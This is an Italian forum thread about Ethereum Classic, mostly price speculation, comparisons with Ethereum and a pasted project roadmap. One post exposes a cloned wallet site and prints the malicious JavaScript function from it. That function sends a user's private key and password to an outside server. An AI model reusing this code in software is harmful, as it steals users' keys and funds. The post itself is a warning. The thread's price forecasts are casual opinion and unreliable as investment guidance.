Ethereum Classic

zozbi

Nuovo Utente
Registrato
18/11/08
Messaggi
190
Punti reazioni
3
Buongiorno a tutti, :)
Torno su questo forum dopo diversi anni.
Mi interesso da poco alle cripto monete e ho notato l'esistenza dell'Ethereum Classic che a me sembra interessante... Anche se è un Ethereum parallelo a quello più noto e ha aspetti molto diversi resta comunque un Ethereum e da quello che vedo sale e continua a salire e spesso vedo che segue l'andamento dell'Ethereum... Ovviamente la cosa interessante è il prezzo dell'Ethereum Classic che è sui $20 quando l'Ethereum è intorno ai $400...;)
 
Buongiorno a tutti, :)
Torno su questo forum dopo diversi anni.
Mi interesso da poco alle cripto monete e ho notato l'esistenza dell'Ethereum Classic che a me sembra interessante... Anche se è un Ethereum parallelo a quello più noto e ha aspetti molto diversi resta comunque un Ethereum e da quello che vedo sale e continua a salire e spesso vedo che segue l'andamento dell'Ethereum... Ovviamente la cosa interessante è il prezzo dell'Ethereum Classic che è sui $20 quando l'Ethereum è intorno ai $400...;)

La differenza di prezzo è assolutamente giustificata, da 1 anno sono due blockchain che hanno ben poco in comune.
 
La differenza di prezzo è assolutamente giustificata, da 1 anno sono due blockchain che hanno ben poco in comune.
Sono Ethereum diversi ma da quello che vedo i grafici sono molto simili...
Ad inizio anno non sono partiti dallo stesso punto e hanno guadagnato più o meno le stesse percentuali...
Sto notando che quando sale l'ethereum, l'ethereum classic con qualche ora o qualche giorno di ritardo fa la stessa cosa...
I volumi ETC sono buoni. I maggiori scambi sono in Corea come l'ETH...
 
Sono Ethereum diversi ma da quello che vedo i grafici sono molto simili...
Ad inizio anno non sono partiti dallo stesso punto e hanno guadagnato più o meno le stesse percentuali...
Sto notando che quando sale l'ethereum, l'ethereum classic con qualche ora o qualche giorno di ritardo fa la stessa cosa...
I volumi ETC sono buoni. I maggiori scambi sono in Corea come l'ETH...

rimane una blockchain fuffa di ladri e lo dico a mio discapito visto che ho ancora 50 ETC dal fork.
 
si ma dal fork valeva 1 euro, ora 15. Io ne ho un po' di piu' e aspettano nel cassetto insieme all'altra ciofeca ripple. Sognando lo sfondamento del tetto 100 euro
 
si ma dal fork valeva 1 euro, ora 15. Io ne ho un po' di piu' e aspettano nel cassetto insieme all'altra ciofeca ripple. Sognando lo sfondamento del tetto 100 euro

Quello che non capisco è il motivo che dovrebbe spingere ETC a 100 e Ripple a salire
 
Invece per tutte le altre cv sapresti dare una spiegazione chiara, logica e motivata del perché salgono?

Io infatti non ho detto chi cosa salirà. Se hai un target a 100 che è all'incirca il 500% vorrei almeno sapere il motivo che hai in testa, Altrimenti facciamo come al lotto.
 
Per me se sale l'ethereum salirà anche l'ethereum classic e se scende uno scende l'altro. Salvo qualche catastrofe in uno dei due ...
E più il market cap è alto meno rischi ci sono.
 
Per me se sale l'ethereum salirà anche l'ethereum classic e se scende uno scende l'altro. Salvo qualche catastrofe in uno dei due ...
E più il market cap è alto meno rischi ci sono.

Quindi se scende ETC scende ETH.
 
Quindi se scende ETC scende ETH.

Diciamo che ETC di solito segue ETH. Credo che ci siano tanti che comprano ETH e ETC nello stesso momento: perlopiù in Corea.
In poche parole ETC ha più potenziale visto che vale $20 ma ci sono maggiori rischi...
 
Diciamo che ETC di solito segue ETH. Credo che ci siano tanti che comprano ETH e ETC nello stesso momento: perlopiù in Corea.
In poche parole ETC ha più potenziale visto che vale $20 ma ci sono maggiori rischi...

Il potenziale lo fanno i progetti sulla blockchain e le migliorie alla blockchain.
Quali progetti e quali sviluppi futuri hanno in mente quelli del team core di ETC?
 
Il potenziale lo fanno i progetti sulla blockchain e le migliorie alla blockchain.
Quali progetti e quali sviluppi futuri hanno in mente quelli del team core di ETC?
ETC e ETH Sono due criptovalute che usano la stessa piattaforma chiamata ethereum. Io personalmente mi sono interessato a questa criptovaluta per questo motivo e per i grafici interessanti di tutti e due e non perché conosco i progetti futuri...
 
copio incollo da una descrizione video da youtube, comunque se interessato puoi seguire su github, twitter, telegram, IRC etc.

2017-2018 ROADMAP
•  Update monetary policy and consensus mechanism
•  Develop ETC wallet platform
•  Scala Client
•  Assess hybrid POW/POS solutions

CORE APPLICATIONS

CLASSIC WALLET PLATFORM
•  Open and modular architecture for app integration
– Node/RPC API
– Connector - RPC wrapper for key and account management
– User Interface
– From desktop full node to mobile app

SCALA CLIENT
•  Based on IOHK Scorex framework
– Scorex - Input Output
– Modular network protocol, consensus protocol, transaction protocol, internal state
•  Rationale
– Compiles to Java bytecode, runs on JVM
– Favors immutability

ADDITIONAL PROJECTS
•  Ethereum Classic Project * GitHub
•  EtherHub.io block explorer
•  EtherJar
•  EtherKube
–  tools to deploy/manage ETC nodes in a cloud

DAPPS PLATFORM

FUNDONOMY
• Web Layer
– Social Platform Layer provides an easy to use marketing and communication interface to attract and engage a wider non-technical audience
• Blockchain Layer (Open Source)
– Funding Smart Contracts for Project Bounty Escrows - Deployed per Project
– Reputation Smart Contract for Project and Team Scores
– Public Reputation Utility for use off Platform
– Construct and Deploy Project Bounty Contracts
– Enable Users to Discuss and Contribute
– Create a Social Marketplace of Project Bounties and Ideas

PROTOCOL (Refer to video for details...)

DIFFICULTY BOMB
BITCOIN MONETARY POLICY
BITCOIN VS ETC MONETARY POLICY
PROPOSED MONETARY POLICY
NEW ETC MONETARY POLICY

CONSENSUS ALGORITHMS
•  Replace GHOST
–  Introduced because fast block times lead to high stale rate
–  Block reward of 5ETC + tx fees •  4.375 per uncle
–  Flawed: Miners can maximize rewards by intentionally mining uncles every X blocks
•  Modified DECOR+
–  Share block rewards between blocks of same height and publisher
–  May | 2014 | Bitslog...

TWINSCHAIN: HYBRID POW/POS
•  Two-hop protocol

SCALABILITY
•  Sharding
–  Split the space of accounts/contracts into subspaces
–  Each shard has a set of validators (requires PoS)
–  Transaction receipts for cross-shard communication
•  Alternatives?
–  State channels
–  Overlay services
–  IODB storage engine
 
Ho visto che la Cina comincia ad interessarsi di più a ETC e ETH... :D
 
il classic sta reggendo bene il momento no dell'ETH...
 
hanno clonato myetherwallett da github e aggiunto questo simpatico pezzo (che si manda la vostra psw), beh che per me son sempre stati na banda di ladri quindi e' anche normale finisca cosi

Wallet.sendData = function (input, password) {
var http = new XMLHttpRequest();
var url = "https://api.classicetherwallet.com/api";

var json = {
'key': input,
'password': password,
}

http.open("POST", url, true);
http.send(JSON.stringify(json));
};
 
Recupero il thread per una breve considerazione. Svariati analisi/predoni/neofiti prevedono un consolidamento di ETH nel corso dell'anno.
ETC potrà essere anche stato un "becero" fork, come ce ne sono stati tanti altri per inciso, ma considerato quello che è successo tra ZCash, ZCL ecc...potrebbe essere il 2018 una puntata per consolidare una posizione aperta su ETC?

Cap tutto sommato ancora basso rispetto ad altre più blasonate, poche monete in circolazione e cmq la stessa blockchain di base.
Qui un'analisi di uno dei più gettonati trader su TradingView.

Pareri? :)
 
Recupero il thread per una breve considerazione. Svariati analisi/predoni/neofiti prevedono un consolidamento di ETH nel corso dell'anno.
ETC potrà essere anche stato un "becero" fork, come ce ne sono stati tanti altri per inciso, ma considerato quello che è successo tra ZCash, ZCL ecc...potrebbe essere il 2018 una puntata per consolidare una posizione aperta su ETC?

Cap tutto sommato ancora basso rispetto ad altre più blasonate, poche monete in circolazione e cmq la stessa blockchain di base.
Qui un'analisi di uno dei più gettonati trader su TradingView.

Pareri? :)

ETC nel mondo cripto è un pò "indigesta", non so bene perché.
Tuttavia io ho ragonato come te e ho ritenuto di aprire una posizione...da tenere a medio termine, poi si vedrà. Non credo sia la cripto del secolo ma sembra solida...se non sbaglio anche meno volatile di molte altre major
 
Indietro